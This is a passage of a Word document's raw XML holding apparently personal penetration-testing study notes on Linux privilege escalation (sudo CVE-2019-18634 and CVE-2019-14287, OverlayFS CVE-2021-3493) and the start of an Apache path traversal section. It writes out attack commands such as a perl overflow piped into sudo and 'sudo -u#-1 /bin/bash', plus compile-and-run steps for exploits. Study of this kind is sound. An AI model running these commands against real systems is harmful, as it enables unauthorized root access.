      </w:pPr>
      <w:r>
        <w:t>./sudo-hax-me-a-sandwich</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E9059" w14:textId="3EF3C683" w:rsidR="009D64C0" w:rsidRDefault="009D64C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>choose target and run again with number designator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291352E1" w14:textId="0B7B144F" w:rsidR="009D64C0" w:rsidRDefault="009D64C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6CBC8" w14:textId="685161D8" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sudo Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14755690" w14:textId="2426C2F4" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2019-18634</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11CBD3" w14:textId="0F53F730" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Buffer Overflow attack to get root permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233EAAEE" w14:textId="16FC80B3" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo earlier than 1.8.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE20E38" w14:textId="50772B0F" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses pwfeedback option in /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BBAC3B" w14:textId="1A83A9F1" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows asterisks in place of blank spaces when inputting passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B41B7" w14:textId="66489B8E" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows for junk input to create overflow and write data to new memory space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A848C74" w14:textId="7DC8ECD3" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allow for shell creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20324547" w14:textId="0B389E6D" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16227811" w14:textId="6D75BFAC" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>perl -e ‘print((“A” x 100 . “\x{00}”) x 50)’ | sudo -S id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59472D48" w14:textId="6167DAEB" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creates a segmentation fault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68464F32" w14:textId="5F6C69FD" w:rsidR="008F4D2A" w:rsidRDefault="008F4D2A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>generate a lot of information via Perl language to pipe into sudo command as a password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AFD47" w14:textId="134A463D" w:rsidR="00630E0B" w:rsidRDefault="00630E0B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>segmentation fault warning indicates vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23753BAC" w14:textId="15427E9C" w:rsidR="00630E0B" w:rsidRDefault="00630E0B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidRPr="00F13BC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/saleemrashid/sudo-cve-2019-18634</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B1C60AC" w14:textId="54B01A81" w:rsidR="00630E0B" w:rsidRDefault="00630E0B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">compile via gcc </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gcc -o &lt;output file&gt; &lt;source file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5B84F" w14:textId="719DB2E4" w:rsidR="00630E0B" w:rsidRDefault="00630E0B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>upload file into target machine and run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4C96B" w14:textId="0EC8F84D" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sudo Security Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA5FF0" w14:textId="35466DCE" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2019-14287</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF4070" w14:textId="7CDF993C" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>versions &lt; 1.8.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29069446" w14:textId="0A79D012" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manually choose to execute a sudo command as another user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30067F" w14:textId="337B7781" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -u#&lt;id&gt; &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A470AC" w14:textId="640A12C8" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Let a user execute a program as they were any other user, but not as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F74FE" w14:textId="136FA144" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00940540">
        <w:t>&lt;user&gt; ALL=(ALL:!root) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A6A65" w14:textId="50A8B68D" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This can be circumnavigated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737013E4" w14:textId="64E948E4" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -u#-1 &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E3E20" w14:textId="2648C8EA" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or UID 4294967295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150867C" w14:textId="59486A9D" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo interprets as 0 (root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2EE50C" w14:textId="69886D40" w:rsidR="00940540" w:rsidRDefault="00940540" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this will only work if you have been granted non-root sudo permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D42A29" w14:textId="357E3597" w:rsidR="005427C8" w:rsidRDefault="00BD29C7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. sudo -u#-1 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DAA5AA" w14:textId="396C7AEB" w:rsidR="00BD29C7" w:rsidRDefault="00BD29C7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/bin/bash because sudo -l reveals it can be run by user without sudo privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4549A" w14:textId="29861C3E" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OverlayFS – CVE-2021-3493</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6388A" w14:textId="214A5A6C" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>What is OverlayFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7BAEC9" w14:textId="494EE6AC" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Linux kernel module that allows the system to combine several mount points into one to allow access of all files from each within one directory structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4439A" w14:textId="4271C931" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>often used by live USBs, having a read only root file system and another partition overlayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22404135" w14:textId="4A506F8C" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OverlayFS Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD42C7F" w14:textId="48DD0363" w:rsidR="005E35CA" w:rsidRDefault="007A6E65" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidR="005E35CA" w:rsidRPr="0001506A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23FB629D" w14:textId="6A924C90" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>overlayfs is a kernel module that is installed by default on Ubuntu 1804 Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0990104D" w14:textId="079925B7" w:rsidR="005E35CA" w:rsidRDefault="007A6E65" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidR="005E35CA" w:rsidRPr="0001506A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BB3D754" w14:textId="58C33EE0" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550043F" w14:textId="681CDD10" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy paste into text file – save as exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D566578" w14:textId="2265AF57" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gcc -o exploit exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32044F1C" w14:textId="60E55966" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run and get root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C747B2" w14:textId="59A3842E" w:rsidR="005E35CA" w:rsidRDefault="005E35CA" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112C8A7" w14:textId="0714DCB0" w:rsidR="005E35CA" w:rsidRDefault="007A6E65" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidR="005E35CA" w:rsidRPr="0001506A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://yagrebu.net/unix/rpi-overlay.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F0D80E7" w14:textId="6B405713" w:rsidR="005E35CA" w:rsidRDefault="007A6E65" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidR="005E35CA" w:rsidRPr="0001506A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wiki.archlinux.org/index.php/Overlay_filesystem</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61836D5D" w14:textId="78326777" w:rsidR="005E35CA" w:rsidRDefault="007A6E65" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r w:rsidR="00B82DF6" w:rsidRPr="0001506A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FE3CA48" w14:textId="66048E6D" w:rsidR="00B82DF6" w:rsidRPr="002C1F0D" w:rsidRDefault="007A6E65" w:rsidP="005E35CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId137" w:history="1">
        <w:r w:rsidR="00B82DF6" w:rsidRPr="0001506A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57D8EB6D" w14:textId="59FF2411" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CVE-2021-41773</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; CVE-2021-42013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5115EA40" w14:textId="4A96DF11" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Path Traversal Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE3BDB" w14:textId="77777777" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t xml:space="preserve">A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E146E" w14:textId="77777777" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t xml:space="preserve">An attacker could use a path traversal attack to map URLs to files outside the expected document root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A24158" w14:textId="77777777" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t xml:space="preserve">If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally (sic) this flaw could leak the source of interpreted files like CGI scripts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F86280" w14:textId="2C178987" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t>This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E03C25B" w14:textId="2EE32E80" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Path Traversal Theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7BB0B3" w14:textId="25EB45E0" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
